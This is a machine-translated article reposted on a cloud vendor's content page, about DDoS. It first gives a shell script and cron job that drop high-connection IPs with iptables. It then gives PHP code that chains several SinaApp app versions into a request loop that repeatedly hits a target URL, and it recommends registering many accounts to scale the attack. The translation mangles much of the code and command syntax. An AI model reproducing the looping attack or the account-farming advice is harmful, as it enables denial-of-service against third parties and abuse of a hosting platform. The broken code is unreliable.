Server DDoS Attack Defense script summary

Source: Internet
Author: User
Tags iptables

The server is DDoS attack Defense shell script


1. Scripting

Mkdir/root/bin

vi/root/bin/dropip.sh

#!/bin/bash

/bin/netstat-na|grep Established|awk ' {print $} ' |awk-f: ' {print $} ' |sort|uniq-c|sort-rn|head-10|grep-v-e ' 192.168 |127.0′|awk ' {if ($2!=null && $1>4) {print $}} ' >/tmp/dropip

For I in $ (CAT/TMP/DROPIP)

Todo

/sbin/iptables-a input-s $i-j DROP

echo "$i kill at ' Date '" >>/var/log/ddos

Done

2. Increased executive authority

chmod +x/root/bin/dropip.sh

3. Add to scheduled task, execute once per minute

Crontab-e

*/1 * * * */root/bin/dropip.sh

Description

The most important is the second line, which gets the top 10 IP established connections and writes the temporary file/tmp/dropip, excluding the internal IP segment 192.168| 127.0. Through the For loop, the IP inside the DROPIP is dropped all through the iptables and then written to the log file/var/log/ddos

Another way is to use PHP to write DDoS attacks, using other cloud platforms to operate

The main use of Sinaapp as a test object.

Test idea: Create 4 versions of the app.

Version 1 home code is as follows:

<php

file_get_contents (' http://2.mars.sinaapp.com/');//version 1 triggers attack (Access version 2)

>

Version 2 Home code:

<php

file_get_contents (' http://www.xxx.com/ip.php ')://Attack target

file_get_contents (' http://3.mars.sinaapp.com/');//Access version 3

>

Version 3 Home code:

<php

For ($i =1 $<=10; $i + +) {//Here's an evil, a few more effects better

file_get_contents (' http://www.xxx.com/ip.php ');

file_get_contents (' http://4.mars.sinaapp.com/'); }

>

Version 4 home code:

<php

file_get_contents (' http://2.mars.sinaapp.com/');//Access version 2, resulting in a dead loop

>

These are the steps to use a Sinaapp user to exploit, expand yourself, register a large number of users, and create more versions to attack. But in the testing process, each app actually has two IP exits. It is better to use multiple users.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.